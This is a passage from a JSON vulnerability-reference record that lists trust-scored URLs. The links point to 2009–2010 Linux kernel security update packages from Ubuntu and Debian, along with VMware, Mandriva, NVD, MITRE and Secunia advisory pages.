        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-20-386_2.6.31-20.58_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-20-generic_2.6.31-20.58_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027027"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027016"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/security/advisoiries"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027026"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027023"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0844"
      },
      {
        "trust": 0.1,
        "url": "http://bit.ly/bb3xjv"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/security"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-0844"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1437"
      },
      {
        "trust": 0.1,
        "url": "http://bit.ly/a3ffw8"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027019"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027022"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027024"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-0846"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027013"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1087"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027753"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1321"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0845"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027020"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4212"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1088"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0846"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4212"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-0845"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027014"
      },
      {
        "trust": 0.1,
        "url": "https://qa.mandriva.com/58219"
      },
      {
        "trust": 0.1,
        "url": "https://qa.mandriva.com/56631"
      },
      {
        "trust": 0.1,
        "url": "https://qa.mandriva.com/57708"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0727"
      },
      {
        "trust": 0.1,
        "url": "https://qa.mandriva.com/57382"
      },
      {
        "trust": 0.1,
        "url": "https://qa.mandriva.com/58221"
      },
      {
        "trust": 0.1,
        "url": "https://qa.mandriva.com/57707"
      },
      {
        "trust": 0.1,
        "url": "http://www.mandriva.com/security/"
      },
      {
        "trust": 0.1,
        "url": "https://qa.mandriva.com/56765"
      },
      {
        "trust": 0.1,
        "url": "http://www.mandriva.com/security/advisories"
      },
      {
        "trust": 0.1,
        "url": "https://qa.mandriva.com/57390"
      },
      {
        "trust": 0.1,
        "url": "http://www.mandriva.com/en/security/kernelupdate"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0727"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=05d43ed8a89c159ff641d472f970e3f1baa66318"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=94673e968cbcce07fa78dac4b0ae05d24b5816e1"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/blog/71/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=221af7f87b97431e3ee21ce4b0e77d5411cf1549"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc64_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4536"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc64_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny2.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc64_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://packages.debian.org/\u003cpkg\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
